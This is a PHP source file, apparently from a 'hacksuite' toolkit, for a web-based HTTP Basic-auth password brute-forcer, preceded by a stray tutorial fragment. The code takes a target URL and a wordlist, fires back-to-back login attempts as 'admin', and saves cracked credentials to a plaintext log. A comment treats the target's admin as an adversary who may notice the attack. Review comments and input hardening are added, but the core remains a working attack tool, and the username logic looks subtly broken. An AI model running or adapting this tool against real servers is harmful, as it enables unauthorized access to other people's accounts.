..show you how to make a multi bridge between THC_DO, THC_SS and THC_II and keep track of the output in realtime using iframes. So what exactly are we going to do? First of all if you..
<?php
/*
Handler for HTTP Auth
Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 13-04-2015
*/
// set variable to be able to save a task
// Both values are assigned before the includes below; presumably the shared
// header/task includes read them — confirm against screen_header.php.
$_MODULE_C = "thc_ht";
// NOTE(review): $_LOG is the file that the loop further down writes a
// url|timestamp|user|password record to, in plaintext. Where this file lives
// and who can read it is decided by WriteF() and the include chain, neither
// of which is visible here — verify it is not readable by other users.
$_LOG = "accounts.php";
// $_PATHS, $_CONTEXT, $sOut, $sEnd, Screen(), ExploitFilter() and WriteF() are
// used below but never defined in this file; presumably they come from the
// files included here — TODO confirm.
include_once("../../Includes/screen_header.php");
include_once($_PATHS['style_root']."/screen.php");
include_once($_PATHS['functions_root']."/scrn.php");
include_once($_PATHS['functions_root']."/fwrite.php");
// options
// Builds the three-line on/off summary that the index view prints. Each row is
// the label prefix mapped to the flag that decides "on" or "off"; rows are
// joined with "<br>\n" and the last row ends with a bare newline.
$aOptionRows = array(
    "<b>logging:</b> " => $_CONTEXT['log'],
    "<b>silence:</b> " => $_CONTEXT['silent'],
    "<b>verbose:</b> " => $_CONTEXT['verbose'],
);
$aOptionLines = array();
foreach($aOptionRows as $sOptionPrefix => $mOptionFlag){
    if($mOptionFlag==true){
        $aOptionLines[] = $sOptionPrefix."on";
    }
    else{
        $aOptionLines[] = $sOptionPrefix."off";
    }
}
$sOptions = implode("<br>\n",$aOptionLines)."\n";
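// Validate the posted form before a task is started. Runs for every submit
// value except the two log actions ("Dump Log" / "Clean Log").
// On success it leaves $sUser, $sScanUrl, $aUrl, $sFile, $aWordlist and
// $iLoops set for the code further down; on any failure it prints a message
// through Screen() and stops.
if(isset($_POST['submit']) && $_POST['submit']!="Dump Log" && $_POST['submit']!="Clean Log"){
    // Read each field once. A missing field (and, for the URL and wordlist, a
    // non-string value such as an array) is treated as an empty string instead
    // of raising notices further down.
    $sPostedUser = (isset($_POST['sUser']) ? $_POST['sUser'] : "");
    $sScanUrl = (isset($_POST['sScanUrl']) && is_string($_POST['sScanUrl']) ? $_POST['sScanUrl'] : "");
    $sWordlist = (isset($_POST['sWordlist']) && is_string($_POST['sWordlist']) ? $_POST['sWordlist'] : "");
    // Yields "admin" when the sUser field is empty and an empty string otherwise.
    $sUser = ($sPostedUser=="" ? "admin" : "");
    if($_POST['submit']=="Test"){
        // "Test" ignores the posted URL and points at the bundled test page.
        $sScanUrl = str_replace("/thc_ht","",$_PATHS['servers_root_http']."/http_authenticate.php");
    }
    // first of all let's see if the url looks valid..
    $aUrl = parse_url($sScanUrl);
    if(!is_array($aUrl) || !isset($aUrl['host']) || !strlen($aUrl['host'])){
        die(Screen($sOut."Invalid target specified.".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
    }
    // This module is the HTTP Auth handler, but the URL is handed to curl
    // as-is, and curl speaks more protocols than HTTP. Refuse any explicit
    // scheme other than http/https so a posted URL cannot steer the server's
    // curl at a different protocol handler. A scheme-less "//host/..." URL is
    // still accepted, as before.
    if(isset($aUrl['scheme']) && !in_array(strtolower($aUrl['scheme']),array("http","https"),true)){
        die(Screen($sOut."Invalid target specified.".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
    }
    if($sWordlist==""){
        die(Screen($sOut."Select a wordlist you want to use.".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
    }
    // NOTE(review): ExploitFilter() is defined elsewhere; whether it strips
    // "../" sequences from the posted filename is not visible from this file.
    $sFile = ExploitFilter($_PATHS['wordlists_root']."/".$sWordlist,0,1);
    // is_file() instead of file_exists(): a directory name must not pass.
    if(!is_file($sFile) || !filesize($sFile)){
        die(Screen($sOut."Expecting a valid filepath to a non empty wordlist.".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
    }
    // The filename comes from the request and its lines are later echoed to
    // the screen, so the resolved path has to stay inside the wordlist
    // directory; otherwise any file readable by the web server could be shown.
    $sWordlistRoot = realpath($_PATHS['wordlists_root']);
    $sResolvedFile = realpath($sFile);
    if($sWordlistRoot===false || $sResolvedFile===false || strpos($sResolvedFile,rtrim($sWordlistRoot,"/\\").DIRECTORY_SEPARATOR)!==0){
        die(Screen($sOut."Expecting a valid filepath to a non empty wordlist.".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
    }
    $aWordlist = file($sFile);
    if($aWordlist===false){
        // file() failed after the checks above (e.g. permissions); do not
        // continue with a non-array.
        die(Screen($sOut."Expecting a valid filepath to a non empty wordlist.".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
    }
    $iLoops = count($aWordlist);
}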
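// Dispatch on the submit button. "Test"/"Bruteforce" fall out of the switch
// and continue into the task code below; every other path prints its view
// and exits.
if(isset($_POST['submit'])){
    // made this switch for extra future options
    switch($_POST['submit']){
        // this will test this script against the test server (TestServer/http_authenticate.php)
        case "Test":
            $_POST['submit'] = "Bruteforce";
            // deliberate fall-through into "Bruteforce"
        // start task enter
        case "Bruteforce":
            include_once($_PATHS['includes_root']."/task_start.php");
            echo $sOut;
            break;
        // Dump Log
        case "Dump Log":
            echo $sOut;
            if(!function_exists("RawToArray")){
                include_once($_PATHS['functions_root']."/raw_to_array.php");
            }
            if(false==($aKeys = RawToArray($_LOG))){
                echo"<b id=h7>[no passwords found yet]</b>";
            }
            else{
                // Log fields hold a posted URL and raw wordlist lines, so they
                // can contain markup. Escape them before they go into the
                // page; echoing them verbatim would let a logged string run as
                // HTML/script in the operator's browser.
                $iKeys = count($aKeys);
                for($x=0;$x<$iKeys;$x++){
                    $sLoggedUrl = htmlspecialchars((string)$aKeys[$x][0],ENT_QUOTES | ENT_SUBSTITUTE,'UTF-8');
                    $sLoggedUser = htmlspecialchars((string)$aKeys[$x][2],ENT_QUOTES | ENT_SUBSTITUTE,'UTF-8');
                    $sLoggedPass = htmlspecialchars((string)$aKeys[$x][3],ENT_QUOTES | ENT_SUBSTITUTE,'UTF-8');
                    // date() needs an integer timestamp; the field is read back from a text file.
                    $sLoggedTime = date($_CONTEXT['time_pattern'].' H:i:s',(int)$aKeys[$x][1]);
                    echo"<b>[".$sLoggedUrl."]</b> (".$sLoggedTime.") => (u)".$sLoggedUser." (p) ".$sLoggedPass."<br>\n";
                }
            }
            exit;
        // Clean Log
        case "Clean Log":
            // NOTE(review): this truncates the log on a plain POST; no
            // anti-CSRF token is checked in this file — confirm whether
            // screen_header.php enforces one.
            echo $sOut;
            echo (WriteF($_LOG,"","w") ? "Successfully cleaned log" : "Failed to clean log");
            echo $sEnd;
            exit;
        // just show index
        default:
            echo $sOut;
            echo $sOptions;
            echo $sEnd;
            exit;
    }
}
else{
    // No form posted: show the index view only.
    echo $sOut;
    echo $sOptions;
    echo $sEnd;
    exit;
}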
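// okidoki let's prepare the task
// Everything echoed from here on is HTML (the literals passed to Screen()
// carry <b>/<br> tags), while the target URL and the wordlist lines come from
// the request and from a file. Those values are escaped before display so they
// cannot inject markup into the operator's page. The raw values are kept for
// the request itself and for the log.
$sShownTarget = htmlspecialchars(
    (isset($aUrl['scheme']) ? $aUrl['scheme'] : "")."://".$aUrl['host'].(isset($aUrl['path']) ? $aUrl['path'] : ""),
    ENT_QUOTES | ENT_SUBSTITUTE,
    'UTF-8'
);
echo Screen("<br>\n<b>Running thc_ht @ ".$sShownTarget."</b><br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
// spit fire...
// Push PHP's own output buffer first, then the SAPI buffer; ob_flush() is
// skipped when no buffer is active so it cannot raise a notice.
if(ob_get_level()>0){
    ob_flush();
}
flush();
// keep track of status
$bFound = false;
$iPadding = strlen((string)$iLoops);
$iAttempts = 0; // requests actually sent; reported in the summary line
$sRequest = "";
$sShownRequest = "";
// let's get this thing in action
// Seen from the target: one Basic-auth request per wordlist line, issued back
// to back with no delay in between and always with the same username. That is
// the pattern failed-login rate limits and account lockout are built to catch.
for($x=0,$y=1;$x<$iLoops;$x++,$y++){
    // make a connection and get the response
    $ch = curl_init();
    $aWordlist[$x] = trim($aWordlist[$x]);
    $sRequest = $sUser.":".$aWordlist[$x];
    $sShownRequest = htmlspecialchars($sRequest,ENT_QUOTES | ENT_SUBSTITUTE,'UTF-8');
    curl_setopt($ch, CURLOPT_URL, $sScanUrl);
    curl_setopt($ch, CURLOPT_USERPWD, $sRequest);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
    curl_setopt($ch, CURLOPT_HEADER,1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
    // curl_exec() returns false on a transport failure; that value matches
    // neither pattern below and so ends up in the "unauthorized" branch.
    $sResponse = curl_exec($ch);
    curl_close($ch);
    $iAttempts++;
    // connection closed.. let's see what we have here..
    if(preg_match('/404 Not Found/',$sResponse)){
        // page doesn't exist, it's in the loop just in case the admin takes the page down if he finds out he's under attack
        echo Screen("<br />\nTarget file doesn't exist!<br />\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
        break;
    }
    // for markup's sake so the output will look better
    $sAttempt = str_pad((string)$y,$iPadding,"0",STR_PAD_LEFT);
    echo Screen("[".$sAttempt."] trying ".$sShownRequest." => ",$_CONTEXT['verbose'],$_CONTEXT['silent']);
    if(!preg_match('/200 OK/',$sResponse)){
        // no access
        echo Screen("unauthorized<br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
    }
    else{
        // bingo
        echo Screen("<b>logged in</b><br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
        $bFound = true;
        if($_CONTEXT['log']==true){
            // NOTE(review): the record is "|"-delimited and written in
            // plaintext; a "|" inside the URL or the password would shift the
            // fields when the log is read back — confirm how RawToArray()
            // splits records.
            WriteF($_LOG,trim($sScanUrl)."|".time()."|".$sUser."|".$aWordlist[$x]."\n");
        }
        break;
    }
    if(ob_get_level()>0){
        ob_flush();
    }
    flush();
}
// $iAttempts is used instead of $y: when the loop runs to the end, $y has
// already been incremented past the last attempt and would over-count by one.
echo Screen("<p><b>attempts:</b> ".$iAttempts." => ".($bFound==true ? $sShownRequest : "no success")." (running time) ".(time()-$_CONTEXT['start_task'])."(s)\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
// update entry in background task file
include_once($_PATHS['includes_root']."/task_end.php");
echo $sEnd;
?>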